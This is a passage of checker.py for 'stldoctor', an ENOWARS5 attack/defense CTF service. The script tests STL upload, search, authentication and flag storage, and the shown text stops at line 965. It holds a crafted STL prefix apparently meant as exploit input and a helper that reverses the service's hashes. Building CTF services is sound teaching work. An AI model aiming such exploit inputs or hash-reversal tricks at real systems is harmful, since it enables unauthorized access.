enowars5-service-stldoctor

STL-Analyzing A/D Service for ENOWARS5 in 2021
git clone https://git.sinitax.com/sinitax/enowars5-service-stldoctor
Log | Files | Refs | README | LICENSE | sfeed.txt

checker.py (38207B)


      1#!/usr/bin/env python3
      2
      3import logging
      4import math
      5import os
      6import random
      7import re
      8import struct
      9import subprocess
     10import time
     11
     12import numpy as np
     13
     14logging.getLogger("_curses").setLevel(logging.CRITICAL)
     15
     16from asyncio import StreamReader, StreamWriter
     17from asyncio.exceptions import TimeoutError
     18from io import BytesIO
     19from logging import LoggerAdapter
     20from typing import Any, Optional, Union, cast
     21
     22from enochecker3 import (
     23    AsyncSocket,
     24    ChainDB,
     25    DependencyInjector,
     26    Enochecker,
     27    ExploitCheckerTaskMessage,
     28    GetflagCheckerTaskMessage,
     29    GetnoiseCheckerTaskMessage,
     30    InternalErrorException,
     31    MumbleException,
     32    PutflagCheckerTaskMessage,
     33    PutnoiseCheckerTaskMessage,
     34)
     35from enochecker3.utils import FlagSearcher, assert_in
     36from stl import mesh
     37
     38rand = random.SystemRandom()
     39generic_alphabet = b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmopqrstuvwxyz0123456789-+.!"
     40script_path = os.path.dirname(os.path.realpath(__file__))
     41extra_models = []
     42for path in os.listdir(f"{script_path}/models"):
     43    if path.endswith(".stl"):
     44        extra_models.append(f"{script_path}/models/{path}")
     45assert len(extra_models) > 0
     46wordlist = [w for w in open(f"{script_path}/wordlist.txt").read().split() if w != ""]
     47prompt = b"\r$ "
     48
     49exploit_0_file_prefix = b"""
     50solid test\xff"""
     51exploit_0_file_suffix = b"""
     52    facet normal 0 0 1.0
     53        outer loop
     54            vertex 1 0 0
     55            vertex 1 1 0
     56            vertex 0 1 0
     57        endloop
     58    endfacet
     59endsolid
     60"""
     61
     62checker = Enochecker("stldoctor", 9090)
     63app = lambda: checker.app
     64
     65
     66async def timed(promise: Any, logger: LoggerAdapter, ctx: str) -> Any:
     67    logger.debug("START: {}".format(ctx))
     68    start = time.time()
     69    result = await promise
     70    end = time.time()
     71    logger.debug("DONE:  {} (took {:.3f} seconds)".format(ctx, end - start))
     72    return result
     73
     74
     75class Session:
     76    def __init__(self, socket: AsyncSocket, logger: LoggerAdapter) -> None:
     77        socket_tuple = cast(tuple[StreamReader, StreamWriter], socket)
     78        self.reader = socket_tuple[0]
     79        self.writer = socket_tuple[1]
     80        self.logger = logger
     81        self.closed = False
     82
     83    async def __aenter__(self) -> "Session":
     84        self.logger.debug("Preparing session")
     85        await self.prepare()
     86        return self
     87
     88    async def __aexit__(self, *args: list[Any], **kwargs: dict[str, Any]) -> None:
     89        self.logger.debug("Closing session")
     90        await self.close()
     91
     92    async def readuntil(self, target: bytes, ctx: Optional[str] = None) -> bytes:
     93        try:
     94            ctxstr = f"readuntil {target!r}" if ctx is None else ctx
     95            data = await timed(self.reader.readuntil(target), self.logger, ctx=ctxstr)
     96            msg = f"read:  {data[:100]!r}{'..' if len(data) > 100 else ''}"
     97            self.logger.debug(msg)
     98            return data
     99        except TimeoutError:
    100            self.logger.critical(f"Service timed out while waiting for {target!r}")
    101            raise MumbleException("Service took too long to respond")
    102
    103    async def readline(self, ctx: Optional[str] = None) -> bytes:
    104        return await self.readuntil(b"\n", ctx=ctx)
    105
    106    async def read(self, n: int, ctx: Optional[str] = None) -> bytes:
    107        try:
    108            ctxstr = f"reading {n} bytes" if ctx is None else ctx
    109            data = await timed(self.reader.readexactly(n), self.logger, ctx=ctxstr)
    110            msg = f"read:  {data[:60]!r}{'..' if len(data) > 60 else ''}"
    111            self.logger.debug(msg)
    112            return data
    113        except TimeoutError:
    114            self.logger.critical(f"Service timed out while reading {n} bytes")
    115            raise MumbleException("Service took too long to respond")
    116
    117    async def drain(self) -> None:
    118        await self.writer.drain()
    119
    120    def write(self, data: bytes) -> None:
    121        msg = f"write: {data[:60]!r}{'..' if len(data) > 60 else ''}"
    122        self.logger.debug(msg)
    123        self.writer.write(data)
    124
    125    async def prepare(self) -> None:
    126        await self.readuntil(prompt)
    127
    128    async def exit(self) -> None:
    129        if self.closed:
    130            return
    131        self.write(b"exit\n")
    132        await self.drain()
    133        await self.readuntil(b"bye!")
    134        await self.close()
    135
    136    async def close(self) -> None:
    137        if self.closed:
    138            return
    139        self.closed = True
    140        self.writer.close()
    141        await self.writer.wait_closed()
    142
    143
    144@checker.register_dependency
    145def _get_session(socket: AsyncSocket, logger: LoggerAdapter) -> Session:
    146    return Session(socket, logger)
    147
    148
    149def includes_all(resp: bytes, targets: list[bytes]) -> bool:
    150    for m in targets:
    151        if m not in resp:
    152            return False
    153    return True
    154
    155
    156def includes_any(resp: bytes, targets: list[bytes]) -> bool:
    157    for m in targets:
    158        if m in resp:
    159            return True
    160    return False
    161
    162
    163def nnt(ino: Optional[tuple[bytes, bytes]]) -> tuple[bytes, bytes]:
    164    assert ino is not None
    165    return ino
    166
    167
    168def nnb(ino: Optional[bytes]) -> bytes:
    169    assert ino is not None
    170    return ino
    171
    172
    173def randbool() -> bool:
    174    return rand.randint(0, 1) == 1
    175
    176
    177def leetify(clean: str) -> str:
    178    conv = {
    179        "O": "0",
    180        "l": "1",
    181        "I": "1",
    182        "Z": "2",
    183        "E": "3",
    184        "A": "4",
    185        "S": "5",
    186        "G": "6",
    187        "T": "7",
    188    }
    189    out = [c.upper() if randbool() else c for c in clean.lower()]
    190    return "".join([conv[c] if c in conv else c for c in out])
    191
    192
    193def fakeid(minlen: int = 25, maxlen: int = 50) -> bytes:
    194    choice = rand.randint(0, 2)
    195    if choice == 0:  # most random without hurting parsing
    196        idlen = rand.randint(minlen, maxlen)
    197        return bytes([rand.randint(33, 127) for i in range(idlen)])
    198    elif choice == 1:  # a cat walking across the keyboard
    199        idlen = rand.randint(minlen, maxlen)
    200        alph = b"0123456789abcdefghijklmopqrstuvwxyz"
    201        return bytes([rand.choice(alph) for i in range(idlen)])
    202    else:  # a hacker band name
    203        idstr = b""
    204        while len(idstr) < minlen:
    205            word = rand.choice(wordlist)
    206            if idstr != b"":
    207                idstr += b"-"
    208            idstr += leetify(word).encode()
    209        idstr += b"-" + leetify(rand.choice(wordlist)).encode()
    210        return idstr[:maxlen]
    211
    212
    213def fakeids(n: int) -> list[bytes]:
    214    return [fakeid() for i in range(n)]
    215
    216
    217def approx_equal(f1: float, f2: float, precision: int = 2) -> bool:
    218    return round(f1, precision) == round(f2, precision)
    219
    220
    221def reverse_hash(hashstr: str) -> bytes:
    222    data = subprocess.check_output([f"{script_path}/revhash/revhash", hashstr])[:-1]
    223    if data == b"":
    224        raise InternalErrorException(f"Failed to find hash preimage of {hashstr!r}")
    225    return data
    226
    227
    228def parse_int(intstr: Union[str, bytes]) -> Optional[int]:
    229    try:
    230        return int(intstr)
    231    except:
    232        return None
    233
    234
    235def parse_float(floatstr: Union[str, bytes]) -> Optional[float]:
    236    try:
    237        return float(floatstr)
    238    except:
    239        return None
    240
    241
    242def has_alph(data: Union[str, bytes], alph: Union[str, bytes]) -> bool:
    243    return len([v for v in data if v not in alph]) == 0
    244
    245
    246def assert_match(data: bytes, pattern: bytes, raiser: Any) -> bytes:
    247    rem = re.search(pattern, data)
    248    if rem is None:
    249        raise raiser(f"Expected pattern {pattern!r} to match {data!r}")
    250    if len(rem.groups()) > 0:
    251        return rem.group(1)
    252    return rem.group(0)
    253
    254
    255def genfile_ascii(solidname: bytes, malformed: bool = None) -> bytes:
    256    # Generate a valid ascii STL file or one that is malformed in a
    257    # way that it can't be interpreted by the service, but might succeed
    258    # with typical stl parsing libraries (as a means to identify them)
    259    indent = bytes([rand.choice(b"\t ") for i in range(rand.randint(1, 4))])
    260    facet_count = rand.randint(4, 30)
    261
    262    if len(solidname) != 0:
    263        content = b"solid " + solidname + b"\n"
    264    else:
    265        content = b"solid\n"
    266
    267    for fi in range(facet_count):
    268        # MALFORM 1: prefix keyword
    269        if malformed == 1:
    270            content += indent * 1 + b"facet norm"
    271        else:
    272            content += indent * 1 + b"facet normal "
    273
    274        vs = [[rand.random() for i in range(3)] for k in range(3)]
    275        norm = np.cross(np.subtract(vs[1], vs[0]), np.subtract(vs[2], vs[0]))
    276        norm = norm / np.linalg.norm(norm)
    277
    278        content += " ".join([f"{v:.2f}" for v in norm]).encode() + b"\n"
    279
    280        # MALFORM 2: too many spaces
    281        if malformed == 2:
    282            content += indent * 2 + b"outer  loop\n"
    283        else:
    284            content += indent * 2 + b"outer loop\n"
    285
    286        for i in range(3):
    287            content += (
    288                indent * 3
    289                + b"vertex "
    290                + " ".join([f"{v:.2f}" for v in vs[i]]).encode()
    291                + b"\n"
    292            )
    293
    294        content += indent * 2 + b"endloop\n"
    295        content += indent + b"endfacet\n"
    296
    297    # MALFORM 3: different endsolid name
    298    if malformed == 3:
    299        content += b"endsolid end\n"
    300    if solidname != b"":
    301        content += b"endsolid " + solidname + b"\n"
    302    else:
    303        content += b"endsolid\n"
    304
    305    return content
    306
    307
    308def genfile_bin(solidname: bytes, malformed: bool = None) -> bytes:
    309    # Generate a valid binary STL file or one that is malformed in a
    310    # way that it can't be interpreted by the service, but might succeed
    311    # with typical stl parsing libraries (as a means to identify them)
    312    facet_count = rand.randint(4, 30)
    313
    314    if len(solidname) > 78:
    315        raise InternalErrorException(
    316            "Solidname to embed in header is larger than header itself"
    317        )
    318    if solidname != "":
    319        content = b"#" + solidname.ljust(78, b"\x00") + b"\x00"
    320    else:
    321        content = b"#" + b"\x00" * 79
    322
    323    # MALFORM 1: specify more facets than are in the file
    324    if malformed == 1:
    325        content += struct.pack("<I", facet_count + rand.randint(3, 7))
    326    else:
    327        content += struct.pack("<I", facet_count)
    328
    329    for fi in range(facet_count):
    330        vs = [[rand.random() for i in range(3)] for k in range(3)]
    331        norm = np.cross(np.subtract(vs[1], vs[0]), np.subtract(vs[2], vs[0]))
    332
    333        # MALFORM 2: invalid float for norm / vec
    334        if malformed == 2:
    335            norm[rand.randint(0, 2)] = math.nan
    336            vs[rand.randint(0, 2)][rand.randint(0, 2)] = math.inf
    337        for i in range(3):
    338            content += struct.pack("<f", norm[i])
    339        for k in range(3):
    340            for i in range(3):
    341                content += struct.pack("<f", vs[k][i])
    342        content += b"\x00\x00"
    343
    344    # MALFORM 3: add extra data to the end of the file
    345    if malformed == 3:
    346        content += bytes([rand.randint(0, 255) for i in range(30)])
    347
    348    return content
    349
    350
    351def genfile(solidname: bytes, filetype: str, malformed: Optional[Any] = None) -> bytes:
    352    if filetype == "ascii":
    353        return genfile_ascii(solidname, malformed=malformed)
    354    elif filetype == "bin":
    355        return genfile_bin(solidname, malformed=malformed)
    356    elif filetype == "garbage":
    357        return bytes([rand.randint(0, 255) for i in range(rand.randint(100, 600))])
    358    else:
    359        raise InternalErrorException("Invalid file type supplied")
    360
    361
    362def getfile(filetype: str) -> tuple[bytes, bytes]:
    363    if filetype == "ascii":
    364        if rand.randint(0, 20) >= 5:
    365            solidname = fakeid()
    366            stlfile = genfile(solidname, "ascii")
    367        else:
    368            model = rand.choice([v for v in extra_models if v.endswith("-ascii.stl")])
    369            stlfile = open(model, "rb").read()
    370            solidname = fakeid()
    371            stlfile = stlfile.replace(b"OpenSCAD_Model", solidname)
    372    else:
    373        if rand.randint(0, 20) >= 5:
    374            solidname = fakeid()
    375            stlfile = genfile(solidname, "bin")
    376        else:
    377            model = rand.choice([v for v in extra_models if v.endswith("-bin.stl")])
    378            stlfile = open(model, "rb").read()
    379            solidname = fakeid(minlen=14, maxlen=14)
    380            stlfile = b"#" + solidname + stlfile[15:]  # replaces b"OpenSCAD Model\n"
    381    return stlfile, solidname
    382
    383
    384def parse_stlinfo(stlfile: bytes) -> Any:
    385    fakefile = BytesIO()
    386    fakefile.write(stlfile)
    387    fakefile.seek(0)
    388    try:
    389        name, data = mesh.Mesh.load(fakefile)
    390        meshinfo = mesh.Mesh(data, True, name=name, speedups=True)  # type: ignore
    391    except Exception as e:
    392        raise InternalErrorException(f"Unable to parse generated STL file: {e}")
    393    bmin = [math.inf for i in range(3)]
    394    bmax = [-math.inf for i in range(3)]
    395    if len(meshinfo.points) == 0:
    396        raise InternalErrorException("Parsed STL mesh has 0 points!")
    397    for p in meshinfo.points:
    398        for k in range(3):
    399            for i in range(3):
    400                bmin[k] = min(bmin[k], float(p[3 * i + k]))
    401                bmax[k] = max(bmax[k], float(p[3 * i + k]))
    402    info = {
    403        "points": meshinfo.points,
    404        "bb_origin": bmin,
    405        "bb_size": [bmax[i] - bmin[i] for i in range(3)],
    406        "size": len(stlfile),
    407        "triangle_count": len(meshinfo.points),
    408    }
    409    return info
    410
    411
    412async def getdb(db: ChainDB, key: str) -> tuple[Any, ...]:
    413    try:
    414        return await db.get(key)
    415    except KeyError:
    416        raise MumbleException(
    417            "Could not retrieve necessary info for service interaction"
    418        )
    419
    420
    421# SERVICE FUNCTIONS #
    422
    423
    424async def do_auth(
    425    session: Session, authstr: bytes, check: bool = True, newuser: bool = True
    426) -> Optional[bytes]:
    427    # Login with authstr
    428    session.write(b"auth\n")
    429    session.write(authstr + b"\n")
    430    await session.drain()
    431
    432    # Check for errors
    433    resp = await session.readuntil(prompt, ctx="reading auth response")
    434    if resp == b"ERR:":
    435        if check:
    436            session.logger.critical(f"Failed to login with {authstr!r}:\n{resp!r}")
    437            raise MumbleException("Authentication not working properly")
    438        return None
    439
    440    # Also check success message
    441    try:
    442        userid = resp.split(b"!", 1)[0].split(b"Logged in with ID ", 1)[1]
    443    except:
    444        session.logger.critical(f"Login with pass {authstr!r} failed:\n{resp!r}")
    445        raise MumbleException("Authentication not working properly")
    446
    447    # Check wether new user
    448    is_newuser = b"Welcome back" not in resp
    449    if is_newuser != newuser:
    450        if check:
    451            if newuser:
    452                session.logger.critical("Unexpectedly, user dir exists already!")
    453            else:
    454                session.logger.critical("Unexpectedly, user dir doesnt exist!")
    455            raise MumbleException("Authentication not working properly")
    456        return None
    457
    458    session.logger.debug(f"Logged in as user: {userid!r}")
    459
    460    return userid
    461
    462
    463async def do_list(session: Session, check: bool = True) -> Optional[bytes]:
    464    session.write(b"list\n")
    465    await session.drain()
    466
    467    # Check for errors
    468    resp = await session.readuntil(prompt, ctx="reading list response")
    469    if b"ERR:" in resp and b">> " not in resp:
    470        if check:
    471            session.logger.critical(f"Failed to list private files:\n{resp!r}")
    472            raise MumbleException("File listing not working properly")
    473        return None
    474
    475    return resp
    476
    477
    478async def do_upload(
    479    session: Session,
    480    modelname: bytes,
    481    stlfile: bytes,
    482    check: bool = True,
    483) -> Optional[bytes]:
    484
    485    session.logger.debug(f"Uploading model with name {modelname!r}")
    486
    487    # start upload and enter name
    488    session.write(b"upload\n")
    489    session.write(modelname + b"\n")
    490    await session.drain()
    491
    492    # check for error with name
    493    await session.readuntil(b"name: ")
    494    resp = await session.read(4, ctx="checking for err response")
    495    if resp == b"ERR:":
    496        resp += await session.readuntil(prompt)
    497        if check:
    498            session.logger.critical(f"Failed during name check: {resp!r}")
    499            raise MumbleException("File upload not working properly")
    500        return None
    501
    502    # write size and contents in together
    503    await session.readuntil(b"size: ")
    504    session.write(f"{len(stlfile)}\n".encode())
    505    session.write(stlfile)
    506    await session.drain()
    507
    508    # check for error with size
    509    resp = await session.read(4, ctx="checking for err response")
    510    if resp == b"ERR:":
    511        resp += await session.readuntil(prompt)
    512        if check:
    513            session.logger.critical(f"Failed during size check: {resp!r}")
    514            raise MumbleException("File upload not working properly")
    515        return None
    516
    517    # checker for error with file
    518    await session.readuntil(b"listening..\n")
    519    resp = await session.readline()
    520    if b"ERR:" in resp:
    521        if check:
    522            session.logger.critical(f"Failed during stl parsing: {resp!r}")
    523            raise MumbleException("File upload not working properly")
    524        await session.readuntil(prompt)
    525        return None
    526
    527    # parse returned id
    528    try:
    529        modelid = resp.rsplit(b"!", 1)[0].split(b"with ID ", 1)[1]
    530        if modelid == b"":
    531            raise Exception
    532    except:
    533        session.logger.critical(f"Invalid size during upload:\n{resp!r}")
    534        raise MumbleException("File upload not working properly")
    535
    536    session.logger.debug(f"Uploaded model with id {modelid!r}")
    537
    538    await session.readuntil(prompt, ctx="waiting for prompt")
    539    return modelid
    540
    541
    542async def do_search(
    543    session: Session,
    544    modelname: bytes,
    545    download: bool = False,
    546    check: bool = True,
    547) -> Optional[tuple[bytes, bytes]]:
    548    session.logger.debug(f"Retrieving model with name {modelname!r}")
    549
    550    # get possible hashes
    551    session.write(b"search " + modelname + b"\n")
    552    await session.drain()
    553
    554    # chck for error with search query
    555    resp = await session.read(4)
    556    if resp == b"ERR:":
    557        resp += await session.readuntil(prompt)
    558        if check:
    559            session.logger.critical(
    560                f"Failed to retrieve model {modelname!r}:\n{resp!r}"
    561            )
    562            raise MumbleException("File search not working properly")
    563        return None
    564
    565    # collect results
    566    resp += await session.readuntil(b"quit]: ")
    567    try:
    568        resp = resp.split(b">")[0]
    569    except:
    570        session.logger.critical('Search response missing b">" delim')
    571        raise MumbleException("File search not working properly")
    572    results = [l.strip() for l in resp.split(b"\n") if l.strip() != b""]
    573
    574    # request most recent result (later in index file)
    575    session.write(results[-1] + b"\n")
    576    session.write(b"y\n" if download else b"n\n")
    577    await session.drain()
    578
    579    # check for error in hash provided
    580    resp = await session.read(4)
    581    if resp == b"ERR:":
    582        # cleanup download y/n interpreted as command
    583        await session.readuntil(prompt)
    584        if check:
    585            session.logger.critical(f"Error selecting file: {results[0]!r}")
    586            raise MumbleException("File search not working properly")
    587        return None
    588    fileinfo = resp + await session.readuntil(
    589        b"================== \n", ctx="reading stl info"
    590    )
    591
    592    stlfile = b""
    593    if download:  # Parse file contents
    594        await session.readuntil(b"Here you go.. (", ctx="reading stl size (1)")
    595        resp = await session.readuntil(b"B)\n", ctx="reading stl size (2)")
    596        resp = resp[:-3]
    597        size = parse_int(resp)
    598        if size is None:
    599            raise MumbleException(f"Invalid download size: {resp!r}")
    600        session.logger.debug(f"Download size: {size}")
    601        stlfile = await session.read(size, ctx="reading stl contents")
    602
    603    # only one result
    604    session.write(b"q\n")
    605    await session.drain()
    606
    607    # cleanup..
    608    await session.readuntil(prompt)
    609    return fileinfo, stlfile
    610
    611
    612# CHECK WRAPPERS #
    613
    614
    615async def check_listed(session: Session, includes: list[bytes]) -> bytes:
    616    resp = nnb(await do_list(session, check=True))
    617    if not includes_all(resp, includes):
    618        session.logger.critical(f"Failed to find {includes} in listing:\n{resp!r}")
    619        raise MumbleException("File listing not working properly")
    620    return resp
    621
    622
    623async def check_not_listed(
    624    session: Session,
    625    excludes: list[bytes],
    626    fail: bool = False,
    627) -> Optional[bytes]:
    628    resp = await do_list(session, check=False)
    629    if resp is not None:
    630        if fail:
    631            session.logger.critical(f"Expected list to fail, but returned:\n{resp!r}")
    632            raise MumbleException("File listing not working properly")
    633        if includes_any(resp, excludes):
    634            session.logger.critical(
    635                f"Unexpectedly found one of {excludes} in listing:\n{resp!r}"
    636            )
    637            raise MumbleException("File listing not working properly")
    638    elif not fail:
    639        session.logger.critical(f"list failed unexpectedly:\n{resp!r}")
    640        raise MumbleException("File listing not working properly")
    641    return resp
    642
    643
    644async def check_in_search(
    645    session: Session,
    646    modelname: bytes,
    647    includes: list[bytes],
    648    download: bool = False,
    649) -> tuple[bytes, bytes]:
    650    resp = nnt(await do_search(session, modelname, download, check=True))
    651    if not includes_all(resp[0] + resp[1], includes):
    652        session.logger.critical(
    653            f"Retrieved info for {modelname!r} is missing {includes}: {resp[0]+resp[1]!r}"
    654        )
    655        raise MumbleException("File search not working properly")
    656    return resp
    657
    658
    659async def check_not_in_search(
    660    session: Session,
    661    modelname: bytes,
    662    excludes: list[bytes],
    663    download: bool = False,
    664    fail: bool = False,
    665) -> Optional[tuple[bytes, bytes]]:
    666    resp = await do_search(session, modelname, download, check=False)
    667    if resp is not None:
    668        combined = resp[0] + resp[1]
    669        if fail:
    670            session.logger.critical(
    671                "Search for {modelname!r} succeeded unexpectedly:\n{combined!r}"
    672            )
    673            raise MumbleException("File search not working properly")
    674        if includes_any(combined, excludes):
    675            session.logger.critical(
    676                f"Unexpectedly {modelname!r} info contains one of {excludes}: {combined!r}"
    677            )
    678            raise MumbleException("File search not working properly")
    679    elif not fail:
    680        session.logger.critical(f"Search for {modelname!r} failed unexpectedly")
    681        raise MumbleException("File search not working properly")
    682    return resp
    683
    684
    685def check_hash(hashstr: bytes) -> None:
    686    if not has_alph(hashstr, b"0123456789abcdef"):
    687        raise MumbleException("Invalid model hash format returned")
    688
    689
    690def check_stlinfo(
    691    logger: LoggerAdapter,
    692    resp: bytes,
    693    ref_info: Any,
    694    ref_modelid: Optional[bytes] = None,
    695    ref_modelname: Optional[bytes] = None,
    696    ref_solidname: Optional[bytes] = None,
    697) -> None:
    698    def logthrow(msg: str) -> None:
    699        logger.critical(msg)
    700        raise MumbleException("STL parsing not working properly")
    701
    702    size = parse_int(assert_match(resp, b"File Size: (.*)\n", MumbleException))
    703    if not size or size != ref_info["size"]:
    704        logthrow(
    705            f"STL info returned no / invalid file size: {size} != {ref_info['size']}"
    706        )
    707
    708    triangle_count = parse_int(
    709        assert_match(resp, b"Triangle Count: (.*)\n", MumbleException)
    710    )
    711    if not triangle_count or triangle_count != ref_info["triangle_count"]:
    712        logthrow(
    713            f"STL info returned no / invalid triangle count: {triangle_count} != {ref_info['triangle_count']}"
    714        )
    715
    716    bb_size_str = assert_match(resp, b"Bounding Box Size: (.*)\n", MumbleException)
    717    bb_size = [parse_float(v) for v in bb_size_str.split(b" x ")]
    718    for i in range(3):
    719        val = bb_size[i]
    720        if val is None:
    721            logthrow(f"STL info returned invalid bounding box size: {bb_size_str!r}")
    722        elif not approx_equal(val, ref_info["bb_size"][i]):
    723            logthrow(
    724                f"Bounding box size doesnt match: (REF) {ref_info['bb_size']} {bb_size}"
    725            )
    726
    727    bb_origin_str = assert_match(resp, b"Bounding Box Origin: (.*)\n", MumbleException)
    728    bb_origin = [parse_float(v) for v in bb_origin_str.split(b" x ")]
    729    for i in range(3):
    730        val = bb_origin[i]
    731        if val is None:
    732            logthrow(
    733                f"STL info returned invalid bounding box origin: {bb_origin_str!r}"
    734            )
    735        elif not approx_equal(val, ref_info["bb_origin"][i]):
    736            logthrow(
    737                f"Bounding box origin doesnt match: (REF) {ref_info['bb_origin']} {bb_origin}"
    738            )
    739
    740    triangle_count = parse_int(
    741        assert_match(resp, b"Triangle Count: (.*)\n", MumbleException)
    742    )
    743    if triangle_count is None or triangle_count != ref_info["triangle_count"]:
    744        logthrow(
    745            f"Triangle count {triangle_count} doesnt match expected: {ref_info['triangle_count']}"
    746        )
    747
    748    if ref_modelname:
    749        modelname = assert_match(resp, b"Model Name: (.*)\n", MumbleException)
    750        if modelname != ref_modelname:
    751            logthrow(f"Got modelname {modelname!r}, expected {ref_modelname!r}")
    752
    753    if ref_modelid:
    754        modelid = assert_match(resp, b"Model ID: (.*)\n", MumbleException)
    755        if modelid != ref_modelid:
    756            logthrow(f"Got modelid {modelid!r}, expected {ref_modelid!r}")
    757
    758    if ref_solidname:
    759        solidname = assert_match(resp, b"Solid Name: (.*)\n", MumbleException)
    760        if solidname != ref_solidname:
    761            logthrow(f"Got solidname {solidname!r}, expected {ref_solidname!r}")
    762
    763
    764# TEST METHODS #
    765
    766
    767async def test_good_upload(di: DependencyInjector, filetype: str) -> None:
    768    modelname = fakeid()
    769    stlfile, solidname = getfile(filetype)
    770    ref = parse_stlinfo(stlfile)
    771
    772    # Upload file, get it with search, verify returned info
    773    session = await di.get(Session)
    774    modelid = nnb(await do_upload(session, modelname, stlfile, check=True))
    775    expected = [modelname, solidname, stlfile, modelid]
    776    info, stl = await check_in_search(session, modelname, expected, download=True)
    777    check_stlinfo(
    778        session.logger,
    779        info,
    780        ref,
    781        ref_modelname=modelname,
    782        ref_modelid=modelid,
    783        ref_solidname=solidname,
    784    )
    785
    786
    787async def test_bad_upload(di: DependencyInjector, filetype: str, variant: int) -> None:
    788    modelname, solidname = fakeids(2)
    789    stlfile = genfile(solidname, filetype, malformed=variant)
    790
    791    # Ensure a malformed file causes an error
    792    session = await di.get(Session)
    793    resp = await do_upload(session, modelname, stlfile, check=False)
    794    if resp is not None:
    795        session.logger.critical(f"Able to upload malformed file:\n{stlfile!r}")
    796        raise MumbleException("Upload validation not working properly")
    797
    798
    799async def test_hash_collision(di: DependencyInjector) -> None:
    800    # See if using a random string we hit a hash collision for search / auth
    801    session = await di.get(Session)
    802    sresp = await do_search(session, fakeid(), download=False, check=False)
    803    if sresp is not None:
    804        session.logger.critical("File search succeeded on random file")
    805        raise MumbleException("Hash function not working properly")
    806    aresp = await do_auth(session, fakeid(), check=False, newuser=False)
    807    if aresp is not None:
    808        session.logger.critical("Auth succeeded for user with random str")
    809        raise MumbleException("Hash function not working properly")
    810
    811
    812# CHECKER METHODS #
    813
    814
    815@checker.putflag(0)
    816async def putflag_guest(task: PutflagCheckerTaskMessage, di: DependencyInjector) -> str:
    817    modelname = fakeid()
    818    stlfile = genfile(task.flag.encode(), "ascii")
    819    db = await di.get(ChainDB)
    820
    821    # Generate a file with flag in solidname and upload it (unregistered, ascii)
    822    session = await di.get(Session)
    823    modelid = nnb(await do_upload(session, modelname, stlfile, check=True))
    824
    825    await db.set("info", (modelname, modelid))
    826    return "Model {}.. is kinda sus".format(modelid[:10].decode())
    827
    828
    829@checker.putflag(1)
    830async def putflag_private(
    831    task: PutflagCheckerTaskMessage, di: DependencyInjector
    832) -> str:
    833    modelname, authstr = fakeids(2)
    834    stlfile = genfile(task.flag.encode(), "bin")
    835    db = await di.get(ChainDB)
    836
    837    # Generate a file with flag in solidname and upload it (registered, bin)
    838    session = await di.get(Session)
    839    userid = nnb(await do_auth(session, authstr, check=True, newuser=True))
    840    modelid = nnb(await do_upload(session, modelname, stlfile, check=True))
    841
    842    await db.set("info", (modelname, modelid, authstr))
    843    return "User {}.. is kinda sus".format(userid[:10].decode())
    844
    845
    846@checker.getflag(0)
    847async def getflag_unregistered(
    848    task: GetflagCheckerTaskMessage, di: DependencyInjector
    849) -> None:
    850    db = await di.get(ChainDB)
    851    modelname, modelid = await getdb(db, "info")
    852
    853    # Search for flag file and verify flag is included
    854    session = await di.get(Session)
    855    sresp = nnt(await do_search(session, modelname, download=True, check=True))
    856    assert_in(task.flag.encode(), sresp[0] + sresp[1], "Failed to retrieve flag")
    857
    858
    859@checker.getflag(1)
    860async def getflag_registered(
    861    task: GetflagCheckerTaskMessage, di: DependencyInjector
    862) -> None:
    863    db = await di.get(ChainDB)
    864    modelname, modelid, authstr = await getdb(db, "info")
    865
    866    # Authenticate, get flag via search and list
    867    session = await di.get(Session)
    868    await do_auth(session, authstr, check=True, newuser=False)
    869    sresp = nnt(await do_search(session, modelname, download=True, check=True))
    870    assert_in(task.flag.encode(), sresp[0] + sresp[1], "Failed to retrieve flag")
    871    lresp = nnb(await do_list(session, check=True))
    872    assert_in(task.flag.encode(), lresp, "Failed to retrieve flag")
    873
    874
    875@checker.putnoise(0)
    876async def putnoise_unregistered(
    877    task: PutnoiseCheckerTaskMessage, di: DependencyInjector
    878) -> None:
    879    modelname, solidname = fakeids(2)
    880    stlfile, solidname = getfile("ascii" if randbool() else "bin")
    881    db = await di.get(ChainDB)
    882
    883    # Upload file for later checking
    884    session = await di.get(Session)
    885    modelid = await do_upload(session, modelname, stlfile, check=True)
    886
    887    await db.set("info", (modelid, modelname, solidname, stlfile))
    888
    889
    890@checker.putnoise(1)
    891async def putnoise_registered(
    892    task: PutnoiseCheckerTaskMessage, di: DependencyInjector
    893) -> None:
    894    modelname, solidname, authstr = fakeids(3)
    895    stlfile, solidname = getfile("ascii" if randbool() else "bin")
    896    db = await di.get(ChainDB)
    897
    898    # Upload private file for later checking
    899    session = await di.get(Session)
    900    await do_auth(session, authstr, check=True, newuser=True)
    901    modelid = await do_upload(session, modelname, stlfile, check=True)
    902
    903    await db.set("info", (modelid, modelname, solidname, stlfile, authstr))
    904
    905
    906@checker.getnoise(0)
    907async def getnoise_unregistered(
    908    task: GetnoiseCheckerTaskMessage, di: DependencyInjector
    909) -> None:
    910    db = await di.get(ChainDB)
    911    modelid, modelname, solidname, stlfile = await getdb(db, "info")
    912    ref = parse_stlinfo(stlfile)
    913
    914    session = await di.get(Session)
    915    # check that search works on persisted file
    916    expected = [modelname, solidname, stlfile, modelid]
    917    info, stl = await check_in_search(session, modelname, expected, download=True)
    918    # check that search for cached value works
    919    info, stl = await check_in_search(session, b"last", expected, download=True)
    920    # check that persisted file info is still valid
    921    check_stlinfo(
    922        session.logger,
    923        info,
    924        ref,
    925        ref_modelname=modelname,
    926        ref_modelid=modelid,
    927        ref_solidname=solidname,
    928    )
    929
    930
    931@checker.getnoise(1)
    932async def getnoise_registered(
    933    task: GetnoiseCheckerTaskMessage, di: DependencyInjector
    934) -> None:
    935    db = await di.get(ChainDB)
    936    modelid, modelname, solidname, stlfile, authstr = await getdb(db, "info")
    937    ref = parse_stlinfo(stlfile)
    938
    939    session = await di.get(Session)
    940    # check that auth works and tells us we are logging in again
    941    await do_auth(session, authstr, check=True, newuser=False)
    942    # check that search works on persisted file
    943    expected = [modelname, solidname, stlfile, modelid]
    944    info, stl = await check_in_search(session, modelname, expected, download=True)
    945    # check that search for cached value works
    946    info, stl = await check_in_search(session, b"last", expected, download=True)
    947    # check that persisted file info is still valid
    948    check_stlinfo(
    949        session.logger,
    950        info,
    951        ref,
    952        ref_modelname=modelname,
    953        ref_modelid=modelid,
    954        ref_solidname=solidname,
    955    )
    956    # check that list works on persisted file
    957    await check_listed(session, [modelname, modelid + b"-", solidname])
    958
    959
    960@checker.havoc(0)
    961async def havoc_good_upload_ascii(di: DependencyInjector) -> None:
    962    await test_good_upload(di, "ascii")
    963
    964
    965@checker.havoc(1)
